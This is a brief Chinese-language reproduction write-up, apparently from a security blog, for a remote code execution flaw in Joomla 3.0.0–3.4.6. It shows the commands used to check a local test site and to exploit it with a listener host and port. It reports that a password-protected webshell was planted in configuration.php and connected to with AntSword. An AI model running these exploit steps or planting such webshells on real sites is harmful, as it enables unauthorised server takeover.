Joomla_3-3.4.6_远程命令执行漏洞

# Joomla 3-3.4.6 远程命令执行漏洞

=========

一、漏洞简介
————

Joomla 3.4.6 – \’configuration.php\’ Remote Code Execution

二、影响范围
————

Joomla 3.0.0 至 3.4.6

三、复现过程
————

### 脚本验证

验证:

python3 test.py -t http://127.0.0.1:8080/

![](/static/qingy/Joomla_3-3.4.6_远程命令执行漏洞/img/rId26.png)

显示”Vulnerable”证明存在漏洞

利用:

python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121

![](/static/qingy/Joomla_3-3.4.6_远程命令执行漏洞/img/rId27.png)

执行成功

并在”configuration.php”写入**随机密码**的一句话木马
![](/static/qingy/Joomla_3-3.4.6_远程命令执行漏洞/img/rId28.png)
上图的密码为:kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi

蚁剑链接测试

image

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容